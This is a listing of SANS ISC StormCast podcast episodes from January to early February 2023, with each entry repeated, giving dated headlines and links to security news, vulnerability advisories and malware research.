Rotating Packet Captures with pfSense https://isc.sans.edu/diary/Rotating%20Packet%20Captures%20with%20pfSense/29500 BEC Group Incorporates Secondary Impersonated Personas https://intelligence.abnormalsecurity.com/blog/firebrick-ostrich-third-party-reconnaissance-attacks MalVirt .Net Virtualization Thrives in Malvertising Attacks https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/ Cisco Remote Code Execution with Persistence https://www.trellix.com/en-us/about/newsroom/stories/research/when-pwning-cisco-persistence-is-key-when-pwning-supply-chain-cisco-is-key.html
2/3/20234 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, February 3rd, 2023

Rotating Packet Captures with pfSense https://isc.sans.edu/diary/Rotating%20Packet%20Captures%20with%20pfSense/29500 BEC Group Incorporates Secondary Impersonated Personas https://intelligence.abnormalsecurity.com/blog/firebrick-ostrich-third-party-reconnaissance-attacks MalVirt .Net Virtualization Thrives in Malvertising Attacks https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/ Cisco Remote Code Execution with Persistence https://www.trellix.com/en-us/about/newsroom/stories/research/when-pwning-cisco-persistence-is-key-when-pwning-supply-chain-cisco-is-key.html
2/3/20234 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, February 2nd, 2023

Detecting Malicious OneNote Files https://isc.sans.edu/diary/Detecting%20%28Malicious%29%20OneNote%20Files/29494 Microsoft Defender Device Isolation for Linux https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-device-isolation-support-for-linux/ba-p/3676400 SH1MMER Exploit for Chromebooks https://sh1mmer.me DOMPDF SVG Parsing Vulnerability https://github.com/dompdf/dompdf/security/advisories/GHSA-3cw5-7cxw-v5qg
2/2/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, February 2nd, 2023

Detecting Malicious OneNote Files https://isc.sans.edu/diary/Detecting%20%28Malicious%29%20OneNote%20Files/29494 Microsoft Defender Device Isolation for Linux https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-device-isolation-support-for-linux/ba-p/3676400 SH1MMER Exploit for Chromebooks https://sh1mmer.me DOMPDF SVG Parsing Vulnerability https://github.com/dompdf/dompdf/security/advisories/GHSA-3cw5-7cxw-v5qg
2/2/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, February 1st, 2023

DShield Honeypot Setup with pfSense https://isc.sans.edu/diary/DShield%20Honeypot%20Setup%20with%20pfSense/29490 Threat Actors Abusing Microsoft's "Verified Publisher" Status https://www.proofpoint.com/us/blog/cloud-security/dangerous-consequences-threat-actors-abusing-microsofts-verified-publisher PoS Malware Can Block Contactless Payments https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/ Detecting Files Exempt from Anti Malware Scans https://github.com/bananabr/TimeException
2/1/20237 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, February 1st, 2023

DShield Honeypot Setup with pfSense https://isc.sans.edu/diary/DShield%20Honeypot%20Setup%20with%20pfSense/29490 Threat Actors Abusing Microsoft's "Verified Publisher" Status https://www.proofpoint.com/us/blog/cloud-security/dangerous-consequences-threat-actors-abusing-microsofts-verified-publisher PoS Malware Can Block Contactless Payments https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/ Detecting Files Exempt from Anti Malware Scans https://github.com/bananabr/TimeException
2/1/20237 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, January 31st, 2023

Decoding DNS over HTTP(s) Requests https://isc.sans.edu/diary/Decoding%20DNS%20over%20HTTP%28s%29%20Requests/29488 Action Needed for GitHub Desktop and Atom Users https://github.blog/2023-01-30-action-needed-for-github-desktop-and-atom-users/ GitHub Checksum Mismatches for .tar.gz Files https://github.com/orgs/community/discussions/45830 Facebook 2FA Bypass https://medium.com/pentesternepal/two-factor-authentication-bypass-on-facebook-3f4ac3ea139c Fortinet Exploit https://wzt.ac.cn/2022/12/15/CVE-2022-42475/ QNAP Vulnerability https://www.qnap.com/en/security-advisory/qsa-23-01
1/31/20237 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, January 31st, 2023

Decoding DNS over HTTP(s) Requests https://isc.sans.edu/diary/Decoding%20DNS%20over%20HTTP%28s%29%20Requests/29488 Action Needed for GitHub Desktop and Atom Users https://github.blog/2023-01-30-action-needed-for-github-desktop-and-atom-users/ GitHub Checksum Mismatches for .tar.gz Files https://github.com/orgs/community/discussions/45830 Facebook 2FA Bypass https://medium.com/pentesternepal/two-factor-authentication-bypass-on-facebook-3f4ac3ea139c Fortinet Exploit https://wzt.ac.cn/2022/12/15/CVE-2022-42475/ QNAP Vulnerability https://www.qnap.com/en/security-advisory/qsa-23-01
1/31/20237 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, January 30th, 2023

Microsoft Tips to Patch Your Exchange Servers https://techcommunity.microsoft.com/t5/exchange-team-blog/protect-your-exchange-servers/ba-p/3726001 FCC Treatens to Take Action Against Twilio over Robocalls https://www.fcc.gov/document/fcc-takes-mortgage-scam-robocall-campaign-targeting-homeowners PlugX Variant Spreads via USB https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/ Adware in Google Play Store https://news.drweb.com/show/review/?lng=en&i=14652 Tails 5.9 Update https://tails.boum.org/news/version_5.9/index.de.html
1/30/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, January 30th, 2023

Microsoft Tips to Patch Your Exchange Servers https://techcommunity.microsoft.com/t5/exchange-team-blog/protect-your-exchange-servers/ba-p/3726001 FCC Treatens to Take Action Against Twilio over Robocalls https://www.fcc.gov/document/fcc-takes-mortgage-scam-robocall-campaign-targeting-homeowners PlugX Variant Spreads via USB https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/ Adware in Google Play Store https://news.drweb.com/show/review/?lng=en&i=14652 Tails 5.9 Update https://tails.boum.org/news/version_5.9/index.de.html
1/30/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, January 27th, 2023

Live Linux IR with UAC https://isc.sans.edu/diary/Live%20Linux%20IR%20with%20UAC/29480 Bitwarden Phishing https://community.bitwarden.com/t/phishing-website-bitwardenlogin-com/49704 https://www.reddit.com/r/Bitwarden/comments/10k2aj5/google_search_ads_showing_fake_bitwarden_web/ PY#RATION Attack Campaign Leverages Fernet Encyrption and Websockets https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/ Skyhigh Security Secure Web Gateway: XSS in Single Sign On Plugin https://www.redteam-pentesting.de/en/advisories/rt-sa-2022-002/-skyhigh-security-secure-web-gateway-cross-site-scripting-in-single-sign-on-plugin Windows Crypto API Vuln PoC https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689 BIND Patches https://kb.isc.org/docs/cve-2022-3094
1/27/20236 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, January 27th, 2023

Live Linux IR with UAC https://isc.sans.edu/diary/Live%20Linux%20IR%20with%20UAC/29480 Bitwarden Phishing https://community.bitwarden.com/t/phishing-website-bitwardenlogin-com/49704 https://www.reddit.com/r/Bitwarden/comments/10k2aj5/google_search_ads_showing_fake_bitwarden_web/ PY#RATION Attack Campaign Leverages Fernet Encyrption and Websockets https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/ Skyhigh Security Secure Web Gateway: XSS in Single Sign On Plugin https://www.redteam-pentesting.de/en/advisories/rt-sa-2022-002/-skyhigh-security-secure-web-gateway-cross-site-scripting-in-single-sign-on-plugin Windows Crypto API Vuln PoC https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689 BIND Patches https://kb.isc.org/docs/cve-2022-3094
1/27/20236 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, January 26th, 2023

First Malicious OneNote Document https://isc.sans.edu/diary/A%20First%20Malicious%20OneNote%20Document/29470 Guidance for Securing Remote Monitoring and Management Software https://media.defense.gov/2023/Jan/25/2003149873/-1/-1/0/JOINT_CSA_RMM.PDF Microsoft Azure-Based Kerberos Attacks Crack Open Cloud Accounts https://www.darkreading.com/cloud/microsoft-azure-kerberos-attacks-open-cloud-accounts Microsoft Blocking XLL Files Downloaded From Internet https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=115485 Lexmark Vulnerablities https://publications.lexmark.com/publications/security-alerts/CVE-2023-23560.pdf VMware VRealize Update https://www.vmware.com/security/advisories/VMSA-2023-0001.html
1/26/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, January 26th, 2023

First Malicious OneNote Document https://isc.sans.edu/diary/A%20First%20Malicious%20OneNote%20Document/29470 Guidance for Securing Remote Monitoring and Management Software https://media.defense.gov/2023/Jan/25/2003149873/-1/-1/0/JOINT_CSA_RMM.PDF Microsoft Azure-Based Kerberos Attacks Crack Open Cloud Accounts https://www.darkreading.com/cloud/microsoft-azure-kerberos-attacks-open-cloud-accounts Microsoft Blocking XLL Files Downloaded From Internet https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=115485 Lexmark Vulnerablities https://publications.lexmark.com/publications/security-alerts/CVE-2023-23560.pdf VMware VRealize Update https://www.vmware.com/security/advisories/VMSA-2023-0001.html
1/26/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, January 25th, 2023

Apple Patch Summary https://isc.sans.edu/forums/diary/Apple%20Updates%20%28almost%29%20Everything%3A%20Patch%20Overview/29472/ ManageEngine News; https://github.com/vonahisec/CVE-2022-47966-Scan KSMBD Vulnerability https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow/ BitWarden Server Side Iterations https://palant.info/2023/01/23/bitwarden-design-flaw-server-side-iterations/ Packet Tuesday: Neighbor Advertisements https://www.youtube.com/watch?v=CoaZjuuY1do
1/25/20236 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, January 25th, 2023

Apple Patch Summary https://isc.sans.edu/forums/diary/Apple%20Updates%20%28almost%29%20Everything%3A%20Patch%20Overview/29472/ ManageEngine News; https://github.com/vonahisec/CVE-2022-47966-Scan KSMBD Vulnerability https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow/ BitWarden Server Side Iterations https://palant.info/2023/01/23/bitwarden-design-flaw-server-side-iterations/ Packet Tuesday: Neighbor Advertisements https://www.youtube.com/watch?v=CoaZjuuY1do
1/25/20236 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, January 24th, 2023

Who's Resolving This Domain https://isc.sans.edu/forums/diary/Who's%20Resolving%20This%20Domain%3F/29462/ Apple Updates Everything https://support.apple.com/en-us/HT201222 NSA IPv6 Security Guidance https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF Roaming Mantis Implements new DNS Changer in tis malicious mobile app https://thehackernews.com/2023/01/roaming-mantis-spreading-mobile-malware.html
1/24/20235 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, January 24th, 2023

Who's Resolving This Domain https://isc.sans.edu/forums/diary/Who's%20Resolving%20This%20Domain%3F/29462/ Apple Updates Everything https://support.apple.com/en-us/HT201222 NSA IPv6 Security Guidance https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF Roaming Mantis Implements new DNS Changer in tis malicious mobile app https://thehackernews.com/2023/01/roaming-mantis-spreading-mobile-malware.html
1/24/20235 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, January 23rd, 2023

Imortance of Signing in Windows Environments https://isc.sans.edu/diary/Importance%20of%20signing%20in%20Windows%20environments/29456 FanDuel Discloses Data Breach Caused by Recent Mailchimp Hack https://www.bleepingcomputer.com/news/security/fanduel-discloses-data-breach-caused-by-recent-mailchimp-hack/ OneNote Documents Used to Embed Malicious Office Documents https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/ Cisco Unified Communications Manager SQL Injection https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-sql-rpPczR8n Possible KeePass Vulnerability https://twitter.com/vomanc/status/1617135599030530054
1/23/20236 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, January 23rd, 2023

Imortance of Signing in Windows Environments https://isc.sans.edu/diary/Importance%20of%20signing%20in%20Windows%20environments/29456 FanDuel Discloses Data Breach Caused by Recent Mailchimp Hack https://www.bleepingcomputer.com/news/security/fanduel-discloses-data-breach-caused-by-recent-mailchimp-hack/ OneNote Documents Used to Embed Malicious Office Documents https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/ Cisco Unified Communications Manager SQL Injection https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-sql-rpPczR8n Possible KeePass Vulnerability https://twitter.com/vomanc/status/1617135599030530054
1/23/20236 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, January 20th, 2023

SPF and DMARC use on 100k most popular domains https://isc.sans.edu/diary/SPF%20and%20DMARC%20use%20on%20100k%20most%20popular%20domains/29452 Sysmon Exploit Released CVE-2022-41120, CVE-2022-44704 https://github.com/Wh04m1001/SysmonEoP ManageEngine CVE-2022-47966 Technical Deep Dive https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ Netcomm Router Vulnerablities https://kb.cert.org/vuls/id/986018 Microsoft Pushes Outdated Office Install Check https://www.bleepingcomputer.com/news/microsoft/microsoft-pushes-kb5021751-to-check-for-outdated-office-installs/
1/20/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, January 20th, 2023

SPF and DMARC use on 100k most popular domains https://isc.sans.edu/diary/SPF%20and%20DMARC%20use%20on%20100k%20most%20popular%20domains/29452 Sysmon Exploit Released CVE-2022-41120, CVE-2022-44704 https://github.com/Wh04m1001/SysmonEoP ManageEngine CVE-2022-47966 Technical Deep Dive https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ Netcomm Router Vulnerablities https://kb.cert.org/vuls/id/986018 Microsoft Pushes Outdated Office Install Check https://www.bleepingcomputer.com/news/microsoft/microsoft-pushes-kb5021751-to-check-for-outdated-office-installs/
1/20/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, January 19th, 2023

Malicious Google Ads for Fake Notepad++ Lead to Aurora Stealer https://isc.sans.edu/diary/Malicious%20Google%20Ad%20--%3E%20Fake%20Notepad%2B%2B%20Page%20--%3E%20Aurora%20Stealer%20malware/29448 Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujan2023.html QT QML Vulnerability https://blog.talosintelligence.com/vulnerability-spotlight-integer-and-buffer-overflow-vulnerabilities-found-in-qt-qml/ sudo sudoedit vulnerablity https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
1/19/20236 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, January 19th, 2023

Malicious Google Ads for Fake Notepad++ Lead to Aurora Stealer https://isc.sans.edu/diary/Malicious%20Google%20Ad%20--%3E%20Fake%20Notepad%2B%2B%20Page%20--%3E%20Aurora%20Stealer%20malware/29448 Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujan2023.html QT QML Vulnerability https://blog.talosintelligence.com/vulnerability-spotlight-integer-and-buffer-overflow-vulnerabilities-found-in-qt-qml/ sudo sudoedit vulnerablity https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
1/19/20236 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, January 18th, 2023

Finding that one GPO setting in a pool of hundreds of GPOs https://isc.sans.edu/diary/Finding%20that%20one%20GPO%20Setting%20in%20a%20Pool%20of%20Hundreds%20of%20GPOs/29442 GIT Code Audit https://x41-dsec.de/security/research/news/2023/01/17/git-security-audit-ostif/ Azure SSRF Flaws https://orca.security/resources/blog/ssrf-vulnerabilities-in-four-azure-services/ SMB Insecure Guest Auth Off By Default In Windows 11 Pro https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb-insecure-guest-auth-now-off-by-default-in-windows-insider/ba-p/3715014 Packet Tuesday: IPv6 Router Advertisements https://www.youtube.com/watch?v=uRWpB_lYIZ8
1/18/20235 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, January 18th, 2023

Finding that one GPO setting in a pool of hundreds of GPOs https://isc.sans.edu/diary/Finding%20that%20one%20GPO%20Setting%20in%20a%20Pool%20of%20Hundreds%20of%20GPOs/29442 GIT Code Audit https://x41-dsec.de/security/research/news/2023/01/17/git-security-audit-ostif/ Azure SSRF Flaws https://orca.security/resources/blog/ssrf-vulnerabilities-in-four-azure-services/ SMB Insecure Guest Auth Off By Default In Windows 11 Pro https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb-insecure-guest-auth-now-off-by-default-in-windows-insider/ba-p/3715014 Packet Tuesday: IPv6 Router Advertisements https://www.youtube.com/watch?v=uRWpB_lYIZ8
1/18/20235 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, January 17th, 2023

PSA: Why you must run an ad blocker when using Google https://isc.sans.edu/diary/PSA%3A%20Why%20you%20must%20run%20an%20ad%20blocker%20when%20using%20Google/29438 NortonLifeLock Password Manager Bruteforcing https://webcache.googleusercontent.com/search?q=cache%3A91Bmx_jTJIkJ%3Ahttps%3A%2F%2Fago.vermont.gov%2Fwp-content%2Fuploads%2F2023%2F01%2F2023-01-09-NortonLifeLock-Gen-Digital-Data-Breach-Notice-to-Consumers.pdf&cd=3&hl=de&ct=clnk&gl=de CVE-2023-0179 Linux kernel stack buffer overflow in nftables: PoC and writeup https://seclists.org/oss-sec/2023/q1/20 MSI (in)Secure Boot https://dawidpotocki.com/en/2023/01/13/msi-insecure-boot/
1/17/20236 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, January 17th, 2023

PSA: Why you must run an ad blocker when using Google https://isc.sans.edu/diary/PSA%3A%20Why%20you%20must%20run%20an%20ad%20blocker%20when%20using%20Google/29438 NortonLifeLock Password Manager Bruteforcing https://webcache.googleusercontent.com/search?q=cache%3A91Bmx_jTJIkJ%3Ahttps%3A%2F%2Fago.vermont.gov%2Fwp-content%2Fuploads%2F2023%2F01%2F2023-01-09-NortonLifeLock-Gen-Digital-Data-Breach-Notice-to-Consumers.pdf&cd=3&hl=de&ct=clnk&gl=de CVE-2023-0179 Linux kernel stack buffer overflow in nftables: PoC and writeup https://seclists.org/oss-sec/2023/q1/20 MSI (in)Secure Boot https://dawidpotocki.com/en/2023/01/13/msi-insecure-boot/
1/17/20236 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, January 16th, 2023

Elon Musk Themed Crypto Scams Flooding YouTube Today https://isc.sans.edu/diary/Elon%20Musk%20Themed%20Crypto%20Scams%20Flooding%20YouTube%20Today/29434 Microsoft Text to Speech Synthesizer https://arxiv.org/pdf/2301.02111.pdf Missing Windows Start Menu https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22H2#2998msgdesc
1/16/20235 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, January 16th, 2023

Elon Musk Themed Crypto Scams Flooding YouTube Today https://isc.sans.edu/diary/Elon%20Musk%20Themed%20Crypto%20Scams%20Flooding%20YouTube%20Today/29434 Microsoft Text to Speech Synthesizer https://arxiv.org/pdf/2301.02111.pdf Missing Windows Start Menu https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22H2#2998msgdesc
1/16/20235 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, January 13th, 2023

Prowler v3: AWS & Azure security assessments https://isc.sans.edu/diary/Prowler%20v3%3A%20AWS%20%26%20Azure%20security%20assessments/29430 Certified Pre-Pw0ned Android TV https://github.com/DesktopECHO/T95-H616-Malware Revolte Attack https://revolte-attack.net NGFW Data Exfiltration https://cymulate.com/blog/data-exfiltration-firewall/
1/13/20236 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, January 13th, 2023

Prowler v3: AWS & Azure security assessments https://isc.sans.edu/diary/Prowler%20v3%3A%20AWS%20%26%20Azure%20security%20assessments/29430 Certified Pre-Pw0ned Android TV https://github.com/DesktopECHO/T95-H616-Malware Revolte Attack https://revolte-attack.net NGFW Data Exfiltration https://cymulate.com/blog/data-exfiltration-firewall/
1/13/20236 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, January 12th, 2023

Passive Detection of Internet-Connected Systems Affected by Exploited Vulnerabilities https://isc.sans.edu/diary/Passive%20detection%20of%20internet-connected%20systems%20affected%20by%20vulnerabilities%20from%20the%20CISA%20KEV%20catalog/29426 Unauthenticed Remote DoS in ksmbd NTLMv2 Authentication https://seclists.org/oss-sec/2023/q1/4 Cisco RV Series Vulnerabilities CVE-2023-20025 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5 Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ Gootkit Abusing VLC https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html
1/12/20236 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, January 12th, 2023

Passive Detection of Internet-Connected Systems Affected by Exploited Vulnerabilities https://isc.sans.edu/diary/Passive%20detection%20of%20internet-connected%20systems%20affected%20by%20vulnerabilities%20from%20the%20CISA%20KEV%20catalog/29426 Unauthenticed Remote DoS in ksmbd NTLMv2 Authentication https://seclists.org/oss-sec/2023/q1/4 Cisco RV Series Vulnerabilities CVE-2023-20025 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5 Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ Gootkit Abusing VLC https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html
1/12/20236 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, January 11th, 2023

Microsoft January 2023 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20January%202023%20Patch%20Tuesday/29420 Cacti Unauthenticated Remote Code Execution https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/ On the Security Vulnerabilities of Text-to-SQL Models https://arxiv.org/pdf/2211.15363.pdf
1/11/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, January 11th, 2023

Microsoft January 2023 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20January%202023%20Patch%20Tuesday/29420 Cacti Unauthenticated Remote Code Execution https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/ On the Security Vulnerabilities of Text-to-SQL Models https://arxiv.org/pdf/2211.15363.pdf
1/11/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, January 10th, 2023

New Year Old Tricks: Hunting for CircleCI Configuration Files https://isc.sans.edu/diary/New%20year%2C%20old%20tricks%3A%20Hunting%20for%20CircleCI%20configuration%20files/29416 Amazon S3 Encrypts New Objects By Default https://aws.amazon.com/blogs/aws/amazon-s3-encrypts-new-objects-by-default/ MatrixSSL Buffer Overflow https://github.com/matrixssl/matrixssl/security/advisories/GHSA-fmwc-gwc5-2g29 Auth0 JsonWebToken Vulnerability CVE-2022-23529 https://unit42.paloaltonetworks.com/jsonwebtoken-vulnerability-cve-2022-23529/
1/10/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, January 10th, 2023

New Year Old Tricks: Hunting for CircleCI Configuration Files https://isc.sans.edu/diary/New%20year%2C%20old%20tricks%3A%20Hunting%20for%20CircleCI%20configuration%20files/29416 Amazon S3 Encrypts New Objects By Default https://aws.amazon.com/blogs/aws/amazon-s3-encrypts-new-objects-by-default/ MatrixSSL Buffer Overflow https://github.com/matrixssl/matrixssl/security/advisories/GHSA-fmwc-gwc5-2g29 Auth0 JsonWebToken Vulnerability CVE-2022-23529 https://unit42.paloaltonetworks.com/jsonwebtoken-vulnerability-cve-2022-23529/
1/10/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, January 9th, 2023

Reversing AutoIT Scripts https://isc.sans.edu/diary/AutoIT%20Remains%20Popular%20in%20the%20Malware%20Landscape/29408 Can You Trust Your VSCode Extensions https://blog.aquasec.com/can-you-trust-your-vscode-extensions A Deep Dive Into Powerat https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi
1/9/20235 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, January 9th, 2023

Reversing AutoIT Scripts https://isc.sans.edu/diary/AutoIT%20Remains%20Popular%20in%20the%20Malware%20Landscape/29408 Can You Trust Your VSCode Extensions https://blog.aquasec.com/can-you-trust-your-vscode-extensions A Deep Dive Into Powerat https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi
1/9/20235 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, January 6th, 2023

More Brazil Malspam Pushing Astaroth (Guildma) in January 2023 https://isc.sans.edu/forums/diary/More%20Brazil%20malspam%20pushing%20Astaroth%20%28Guildma%29%20in%20January%202023/29404/ CircleCI Breach https://circleci.com/blog/january-4-2023-security-alert/ Twitter Leak https://www.bleepingcomputer.com/news/security/200-million-twitter-users-email-addresses-allegedly-leaked-online/ Slack Source Code Leak https://slack.com/blog/news/slack-security-update Control Web Panel Patch CVE-2022-44877 https://github.com/numanturle/CVE-2022-44877 Turla: A Galaxy of Opportunity https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
1/6/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, January 6th, 2023

More Brazil Malspam Pushing Astaroth (Guildma) in January 2023 https://isc.sans.edu/forums/diary/More%20Brazil%20malspam%20pushing%20Astaroth%20%28Guildma%29%20in%20January%202023/29404/ CircleCI Breach https://circleci.com/blog/january-4-2023-security-alert/ Twitter Leak https://www.bleepingcomputer.com/news/security/200-million-twitter-users-email-addresses-allegedly-leaked-online/ Slack Source Code Leak https://slack.com/blog/news/slack-security-update Control Web Panel Patch CVE-2022-44877 https://github.com/numanturle/CVE-2022-44877 Turla: A Galaxy of Opportunity https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
1/6/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, January 5th, 2023

Update to RTRBK - Diff and File Dates in PowerShell https://isc.sans.edu/diary/Update%20to%20RTRBK%20-%20Diff%20and%20File%20Dates%20in%20PowerShell/29400 Google Chrome Sunsetting Legacy Windows Support https://support.google.com/chrome/thread/185534985/sunsetting-support-for-windows-7-8-8-1-in-early-2023?hl=en SHC used to compile cryptominer malware https://asec.ahnlab.com/en/45182/ ManageEngine Password Manager Pro SQL Injection https://pitstop.manageengine.com/portal/en/community/topic/manageengine-security-advisory important-security-fix-released-for-manageengine-password-manager-pro-2-1-2023#:~:text=critical%20security%20vulnerability ForiADC Command Injection in Web Interface https://www.fortiguard.com/psirt/FG-IR-22-061 Raspberry Robin Developments https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe
1/5/20237 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, January 5th, 2023

Update to RTRBK - Diff and File Dates in PowerShell https://isc.sans.edu/diary/Update%20to%20RTRBK%20-%20Diff%20and%20File%20Dates%20in%20PowerShell/29400 Google Chrome Sunsetting Legacy Windows Support https://support.google.com/chrome/thread/185534985/sunsetting-support-for-windows-7-8-8-1-in-early-2023?hl=en SHC used to compile cryptominer malware https://asec.ahnlab.com/en/45182/ ManageEngine Password Manager Pro SQL Injection https://pitstop.manageengine.com/portal/en/community/topic/manageengine-security-advisory important-security-fix-released-for-manageengine-password-manager-pro-2-1-2023#:~:text=critical%20security%20vulnerability ForiADC Command Injection in Web Interface https://www.fortiguard.com/psirt/FG-IR-22-061 Raspberry Robin Developments https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe
1/5/20237 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, January 4th, 2023

NTP Fingerprinting https://isc.sans.edu/diary/Its%20about%20time%3A%20OS%20Fingerprinting%20using%20NTP/29394 Misc Car Vulnerabilities https://samcurry.net/web-hackers-vs-the-auto-industry/ Flipper Zero Phishing https://twitter.com/AlvieriD/status/1609945425871609858 Trend Micro Patch https://helpcenter.trendmicro.com/en-us/article/TMKA-11252 Packet Tuesday: IP Options https://www.youtube.com/watch?v=HldNL3SLLwM
1/4/20236 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, January 4th, 2023

NTP Fingerprinting https://isc.sans.edu/diary/Its%20about%20time%3A%20OS%20Fingerprinting%20using%20NTP/29394 Misc Car Vulnerabilities https://samcurry.net/web-hackers-vs-the-auto-industry/ Flipper Zero Phishing https://twitter.com/AlvieriD/status/1609945425871609858 Trend Micro Patch https://helpcenter.trendmicro.com/en-us/article/TMKA-11252 Packet Tuesday: IP Options https://www.youtube.com/watch?v=HldNL3SLLwM
1/4/20236 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, January 3rd, 2023

Kyverno's container image signature verification bypass https://www.armosec.io/blog/cve-2022-47633-kyvernos-container-image-signature-verification/ Google Smart Spaeker Vulnerability https://downrightnifty.me/blog/2022/12/26/hacking-google-home.html Verizon Decomissions 3G CDMA Network https://www.fiercewireless.com/wireless/verizon-tells-3g-customers-upgrade-they-lose-service EarSpy: Spying Caller Speech and Identity Through Speaker Vibrations https://arxiv.org/pdf/2212.12151.pdf
1/3/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, January 3rd, 2023

